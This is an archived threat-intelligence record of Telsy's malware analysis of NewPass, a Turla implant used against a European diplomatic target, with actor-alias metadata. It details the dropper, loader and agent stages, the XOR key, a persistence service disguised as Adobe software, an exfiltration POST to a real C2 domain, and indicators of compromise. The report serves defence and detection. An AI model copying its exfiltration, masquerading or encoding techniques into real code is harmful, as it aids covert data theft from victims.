{ "id": "bab05f73-3d7d-413b-bede-60d3ad0074ee", "created_at": "2026-04-06T00:22:07.821498Z", "updated_at": "2026-04-10T13:11:57.062146Z", "deleted_at": null, "sha1_hash": "8546d2803da2b86613ade68d8185aad6cd650fcc", "title": "Turla / Venomous Bear updates its arsenal: \"NewPass\" appears on the APT threat scene - Telsy", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1482416, "plain_text": "Turla / Venomous Bear updates its arsenal: \"NewPass\" appears on the\r\nAPT threat scene - Telsy\r\nBy widerview\r\nPublished: 2020-07-14 · Archived: 2026-04-05 14:44:31 UTC\r\nRecently Telsy observed some artifacts related to an attack that occurred in June 2020 that is most likely linked to the\r\npopular Russian Advanced Persistent Threat (APT) known as Venomous Bear (aka Turla or Uroburos). At the best of our\r\nknowledge, this time the hacking group used a previously unseen implant, that we internally named “NewPass“ as one of\r\nthe parameters used to send exfiltrated data to the command and control.\r\nTelsy suspects this implant has been used to target at least one European Union country in the sector of diplomacy and\r\nforeign affairs.\r\nNewPass is quite a complex malware composed by different components that rely on an encoded file to pass information\r\nand configuration between each other. There are at least three components of the malware: a dropper, that deploys the\r\nbinary file; a loader library, that is able to decode the binary file extracting the last component, responsible for performing\r\nspecific operations, such as communicate with the attackers’ command and control server (the “agent”)\r\nhttps://www.telsy.com/turla-venomous-bear-updates-its-arsenal-newpass-appears-on-the-apt-threat-scene/\r\nPage 1 of 9\n\nThe loader and the agent share a JSON configuration resident in memory that demonstrate the potential of the malware and\r\nthe ease with which the attackers can customize the implant by simply changing the configuration entries’ values.\r\nDropper Analysis \r\nThe first Windows library has a huge size, about 2.6 MB, and it is identified by the following hash:\r\nType Value\r\nSHA256 e1741e02d9387542cc809f747c78d5a352e7682a9b83cbe210c09e2241af6078\r\nExploring the artifact using a static approach, it is possible to note that it exports a high number of functions, as shown in\r\nthe following image.\r\nMost of the reported functions point to useless code and only LocalDataVer can be used as an entry point of the DLL,\r\ntherefore making it useful to understand the malicious behavior.\r\nAttackers used this trick likely to avoid sandbox analysis, as well as make manual analysis slightly harder. Sandbox\r\nsolutions, in fact, probably will try to execute a DLL file using rundll32.exe or regsvr32.exe utilities, using “DllMain” or\r\n“DllRegisterServer” as an entrypoint function. In this case, both these functions cause the termination of the program,\r\nwithout showing the real malware behavior.\r\nThe library’s aim is to deploy the backdoor and its configuration file under two different folders depending on attacker’s\r\ncustomization.\r\nAccording to what has been observed by our research team, the paths used in this case are the following:\r\nConfiguration Path Backdoor Path\r\nProgramData\\Adobe\\ARM\\Reader_20.021.210_47.dat\r\nC:\\Program Files\r\n(x86)\\Adobe\\Acrobat Reader\r\nDC\\Reader\\lib3DXquery.dll\r\nProgramData\\WindowsHolographic\\SpatialStore\\HolographicSpatialStore.swid WindowsHolographicService.dll\r\nhttps://www.telsy.com/turla-venomous-bear-updates-its-arsenal-newpass-appears-on-the-apt-threat-scene/\r\nPage 2 of 9\n\nFor the second sample we weren’t able to retrieve its dropper. Therefore, it is possible to obtain the location of the\r\nconfiguration file from which the backdoor tried to load the parameters, but not the exact location in which the dropper\r\ndeployed the implant artifact.\r\nFurthermore, the used paths are very stealthy and it is easy to confuse the artifacts as components of legitimate programs,\r\nsuch as Adobe Reader or Windows Mixed Reality.\r\nIn particular, the path of the first sample is the same used by the legitimate Adobe Reader installation and therefore\r\nthe lib3DXquery.dll file matches up perfectly with the other Adobe components, making it almost totally invisible.\r\nThe configuration file written, at first glance, seems to be totally encrypted and incomprehensible without analyzing the\r\nnext stage. The following image shows the configuration file in its raw form.\r\nLoader Analysis \r\nThe retrieved backdoor implants are identified by the following hashes:\r\nName SHA256\r\nlib3DXquery.dll 6e730ea7b38ea80f2e852781f0a96e0bb16ebed8793a5ea4902e94c594bb6ae0\r\nWindowsHolographicService.dll f966ef66d0510da597fec917451c891480a785097b167c6a7ea130cf1e8ff514\r\nOnce again, the libraries export several functions but only one is useful to execute their real payload.\r\nhttps://www.telsy.com/turla-venomous-bear-updates-its-arsenal-newpass-appears-on-the-apt-threat-scene/\r\nPage 3 of 9\n\nTo begin, the library checks the presence of the associated configuration file, if it does not exist, the backdoor terminates its\r\nexecution. Vice versa, once found the file the malware starts to decode and read the current configuration.\r\nThe first 5 bytes of the file contains the size of the data to read starting from the 6\r\nth\r\n bytes and which contains the first\r\nencoded information useful to allow the malware to load the entire configuration.\r\nAll the data retrieved in this first phase is encoded using a simple XOR algorithm with a fixed key 19 B9 20 5A B8 EF 2D\r\nA3 73 08 C1 53, hardcoded at the beginning of the function as represented in the following image.\r\nhttps://www.telsy.com/turla-venomous-bear-updates-its-arsenal-newpass-appears-on-the-apt-threat-scene/\r\nPage 4 of 9\n\nSo, the malware reads the first 5 bytes and decodes it using the key, obtaining the number of the bytes it has to read to\r\nobtain the initial configuration.\r\nIn this specific case, from the decoded bytes it gets the value 00081.\r\nSo, it proceeds to read other next 81 bytes.\r\nhttps://www.telsy.com/turla-venomous-bear-updates-its-arsenal-newpass-appears-on-the-apt-threat-scene/\r\nPage 5 of 9\n\nDecoding these last ones with the usual key, it obtains a string composed by different parameters separated by “||”, as\r\nillustrated below.\r\nHowever, this is still not the final configuration used by the malware, but it contains only the parameters to load the last\r\nmalicious Windows library, named LastJournalx32.adf, containing the final agent.\r\nThis payload is hidden into the configuration file after a section of random bytes used by the attackers to change the hash\r\nvalue of the file at every infection.\r\nDuring its activity, the loader decrypts and maintains in memory the complete configuration used during the infection\r\nchain.\r\nIt consists of different JSON formatted structures that look like the following:\r\n{    “RefreshToken”:””,    “NoInternetSleepTime”:”3600″,    “GetMaxSize”:”60000″,    “ClientId”:””,   \r\n“DropperExportFunctionName”:”LocalDataVer”,    “Autorun”:”16″,   \r\n“ImgurImageDeletionTime”:”120″,    “RecoveryServers”:[      ],    “RunDllPath”:”%WinDir%\\\\System32″,\r\n   “AgentLoaderExportFunctionName”:”LocalDataVer”,    “Key”:”[…redacted…]”,   \r\n“AgentName”:”LastJournalx32.adf”,    “UserAgent”:””,    […truncated…]\r\nThe structure contains all the information necessary for the loader to correctly launch the final agent. Some of these\r\ninformation are AgentFileSystemName, AgentExportName and AgentName.\r\nThe agent shares the same memory space of the loader, thus it is able to access to the same configuration and to extract the\r\nneeded parameters, such as the object named Credentials. It also contains the domain name (newshealthsport[.]com) and\r\nhttps://www.telsy.com/turla-venomous-bear-updates-its-arsenal-newpass-appears-on-the-apt-threat-scene/\r\nPage 6 of 9\n\nthe path (/sport/latest.php) of the command-and-control with which the agent will communicate.\r\nFrom the configuration it is also possible to notice the version number of the malware, specifically it is 19.03.28 for\r\nthe AgentLoader and 19.7.16 for the Agent.\r\nMoreover, the agent is identified by an ID addressed by the AgentID entry that is used during the communication with the\r\nC2 as identifier of the infected machine.\r\nThe configuration also embeds a specific structure for persistence mechanisms that appears as follow:\r\n{     “Autoruns”: {         “Service”: {             “DisplayName”: “Adobe Update Module”,            \r\n“ServiceName”: “Adobe Update Module”,             “Enabled”: “true”         },         “TaskScheduler”: {\r\n            “Enabled”: “false”         },         “Registry”: {             “Enabled”: “false”         },         “Policies”: {\r\n            “Enabled”: “false”         }     } }\r\nThe implant supports different types of persistence mechanisms: through Service Manager, Task Scheduler, via Registry\r\nKey or using Windows GPO.\r\nIn this specific case, attackers enabled the Service method that allows the malware to interact with the SCManager to\r\ncreate a new service named Adobe Update Module pointing to the path of the loader.\r\nAgent Analysis\r\nThe last payload is identified by the following hash:\r\nType Value\r\nSHA256 08a1c5b9b558fb8e8201b5d3b998d888dd6df37dbf450ce0284d510a7104ad7f\r\nIt is responsible for exfiltrating information from the infected machine, sending it to the command-and-control and\r\ndownloading new commands to be executed.\r\nTo make the communication with the C2 stealthier, the agent uses a set of keywords to separate the data within a POST\r\nrequest. The keywords are specified by attackers during development phase.\r\nIn the analyzed case, they are the following:\r\ndbnew\r\ncontentname\r\nnewpass\r\npassdb\r\ndata_src\r\nserver_login\r\ntable_data\r\ntoken_name\r\nserver_page\r\ntargetlogin\r\nSo, during the exfiltration phase, the HTTP requests appear as reported in the table below\r\nhttps://www.telsy.com/turla-venomous-bear-updates-its-arsenal-newpass-appears-on-the-apt-threat-scene/\r\nPage 7 of 9\n\nPOST /sport/latest.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent:\r\nMozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: newshealthsport. com\r\nContent-Length: 170 Connection: Keep-Alive   newpass=[redacted]\u0026server_page=[redacted]\u0026passdb=\r\n[redacted]\u0026targetlogin=t\u0026table_data=[redacted]  \r\nAll the values embedded into the request are encrypted, probably using one of the keys embedded into the previous\r\nconfiguration. The algorithm used during the encryption phase is most probably a custom one.\r\nBelow, we report a simple scheme of the described infection chain, highlighting the three components of this new threat:\r\nthe dropper, the loader and the agent.\r\nPersistence\r\nAs mentioned above, the malware is able to create services or tasks or to add registry keys to achieve persistence. In the\r\nanalyzed case, the loader component is set to create a new Windows service, specifying its path location as ImagePath.\r\nATT\u0026CK Matrix\r\nTechnique Tactic Description\r\nT1204 Execution\r\nThreat actor relies upon specific actions by a user in order to gain\r\nexecution\r\nT1060 Persistence\r\nThreat actor adds an entry to the “run keys” in the Registry or startup\r\nfolder to allow the program will be executed when a user logs in\r\nT1053 Persistence\r\nThreat actor uses Windows Task Scheduler to schedule programs or\r\nscripts to be executed at a date and time\r\nT1543 Persistence\r\nAdversaries create or modify Windows services to repeatedly execute\r\nmalicious payloads as part of persistence\r\nT1073\r\nDefense\r\nEvasion\r\nPrograms specifies DLLs that are loaded at runtime\r\nhttps://www.telsy.com/turla-venomous-bear-updates-its-arsenal-newpass-appears-on-the-apt-threat-scene/\r\nPage 8 of 9\n\nT1132\r\nCommand and\r\ncontrol\r\nCommand and control (C2) information is encoded using a standard\r\ndata encoding system\r\nT1001\r\nCommand and\r\nControl\r\nCommand and control (C2) communications are hidden in an attempt\r\nto make the content more difficult to discover or decipher\r\nT1041 Exfiltration\r\nThreat actor relies on command and control infrastructure to exfiltrate\r\ndata\r\nIndicators of Compromise\r\nType Value\r\nSHA256 e1741e02d9387542cc809f747c78d5a352e7682a9b83cbe210c09e2241af6078\r\nSHA256 6e730ea7b38ea80f2e852781f0a96e0bb16ebed8793a5ea4902e94c594bb6ae0\r\nSHA256 08a1c5b9b558fb8e8201b5d3b998d888dd6df37dbf450ce0284d510a7104ad7f\r\nSHA256 f966ef66d0510da597fec917451c891480a785097b167c6a7ea130cf1e8ff514\r\nDomain newshealthsport. com\r\nURL http://newshealthsport. com/sport/latest.php\r\nCheck other cyber reports on our site.\r\nPost navigation\r\nSource: https://www.telsy.com/turla-venomous-bear-updates-its-arsenal-newpass-appears-on-the-apt-threat-scene/\r\nhttps://www.telsy.com/turla-venomous-bear-updates-its-arsenal-newpass-appears-on-the-apt-threat-scene/\r\nPage 9 of 9", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia", "ETDA" ], "origins": [ "web" ], "references": [ "https://www.telsy.com/turla-venomous-bear-updates-its-arsenal-newpass-appears-on-the-apt-threat-scene/" ], "report_names": [ "turla-venomous-bear-updates-its-arsenal-newpass-appears-on-the-apt-threat-scene" ], "threat_actors": [ { "id": "8aaa5515-92dd-448d-bb20-3a253f4f8854", "created_at": "2024-06-19T02:03:08.147099Z", "updated_at": "2026-04-10T02:00:03.685355Z", "deleted_at": null, "main_name": "IRON HUNTER", "aliases": [ "ATK13 ", "Belugasturgeon ", "Blue Python ", "CTG-8875 ", "ITG12 ", "KRYPTON ", "MAKERSMARK ", "Pensive Ursa ", "Secret Blizzard ", "Turla", "UAC-0003 ", "UAC-0024 ", "UNC4210 ", "Venomous Bear ", "Waterbug " ], "source_name": "Secureworks:IRON HUNTER", "tools": [ "Carbon-DLL", "ComRAT", "LightNeuron", "Mosquito", "PyFlash", "Skipper", "Snake", "Tavdig" ], "source_id": "Secureworks", "reports": null }, { "id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac", "created_at": "2022-10-25T16:07:24.349252Z", "updated_at": "2026-04-10T02:00:04.949821Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "ATK 13", "Belugasturgeon", "Blue Python", "CTG-8875", "G0010", "Group 88", "ITG12", "Iron Hunter", "Krypton", "Makersmark", "Operation Epic Turla", "Operation Moonlight Maze", "Operation Penguin Turla", "Operation Satellite Turla", "Operation Skipper Turla", "Operation Turla Mosquito", "Operation WITCHCOVEN", "Pacifier APT", "Pensive Ursa", "Popeye", "SIG15", "SIG2", "SIG23", "Secret Blizzard", "TAG-0530", "Turla", "UNC4210", "Venomous Bear", "Waterbug" ], "source_name": "ETDA:Turla", "tools": [ "ASPXSpy", "ASPXTool", "ATI-Agent", "AdobeARM", "Agent.BTZ", "Agent.DNE", "ApolloShadow", "BigBoss", "COMpfun", "Chinch", "Cloud Duke", "CloudDuke", "CloudLook", "Cobra Carbon System", "ComRAT", "DoublePulsar", "EmPyre", "EmpireProject", "Epic Turla", "EternalBlue", "EternalRomance", "GoldenSky", "Group Policy Results Tool", "HTML5 Encoding", "HyperStack", "IcedCoffee", "IronNetInjector", "KSL0T", "Kapushka", "Kazuar", "KopiLuwak", "Kotel", "LOLBAS", "LOLBins", "LightNeuron", "Living off the Land", "Maintools.js", "Metasploit", "Meterpreter", "MiamiBeach", "Mimikatz", "MiniDionis", "Minit", "NBTscan", "NETTRANS", "NETVulture", "Neptun", "NetFlash", "NewPass", "Outlook Backdoor", "Penquin Turla", "Pfinet", "PowerShell Empire", "PowerShellRunner", "PowerShellRunner-based RPC backdoor", "PowerStallion", "PsExec", "PyFlash", "QUIETCANARY", "Reductor RAT", "RocketMan", "SMBTouch", "SScan", "Satellite Turla", "SilentMoon", "Sun rootkit", "TTNG", "TadjMakhal", "Tavdig", "TinyTurla", "TinyTurla Next Generation", "TinyTurla-NG", "Topinambour", "Tunnus", "Turla", "Turla SilentMoon", "TurlaChopper", "Uroburos", "Urouros", "WCE", "WITCHCOVEN", "WhiteAtlas", "WhiteBear", "Windows Credential Editor", "Windows Credentials Editor", "Wipbot", "WorldCupSec", "XTRANS", "certutil", "certutil.exe", "gpresult", "nbtscan", "nbtstat", "pwdump" ], "source_id": "ETDA", "reports": null }, { "id": "a97fee0d-af4b-4661-ae17-858925438fc4", "created_at": "2023-01-06T13:46:38.396415Z", "updated_at": "2026-04-10T02:00:02.957137Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "TAG_0530", "Pacifier APT", "Blue Python", "UNC4210", "UAC-0003", "VENOMOUS Bear", "Waterbug", "Pfinet", "KRYPTON", "Popeye", "SIG23", "ATK13", "ITG12", "Group 88", "Uroburos", "Hippo Team", "IRON HUNTER", "MAKERSMARK", "Secret Blizzard", "UAC-0144", "UAC-0024", "G0010" ], "source_name": "MISPGALAXY:Turla", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3", "created_at": "2022-10-25T15:50:23.509601Z", "updated_at": "2026-04-10T02:00:05.277674Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "Turla", "IRON HUNTER", "Group 88", "Waterbug", "WhiteBear", "Krypton", "Venomous Bear", "Secret Blizzard", "BELUGASTURGEON" ], "source_name": "MITRE:Turla", "tools": [ "PsExec", "nbtstat", "ComRAT", "netstat", "certutil", "KOPILUWAK", "IronNetInjector", "LunarWeb", "Arp", "Uroburos", "PowerStallion", "Kazuar", "Systeminfo", "LightNeuron", "Mimikatz", "Tasklist", "LunarMail", "HyperStack", "NBTscan", "TinyTurla", "Penquin", "LunarLoader" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434927, "ts_updated_at": 1775826717, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/8546d2803da2b86613ade68d8185aad6cd650fcc.pdf", "text": "https://archive.orkl.eu/8546d2803da2b86613ade68d8185aad6cd650fcc.txt", "img": "https://archive.orkl.eu/8546d2803da2b86613ade68d8185aad6cd650fcc.jpg" } }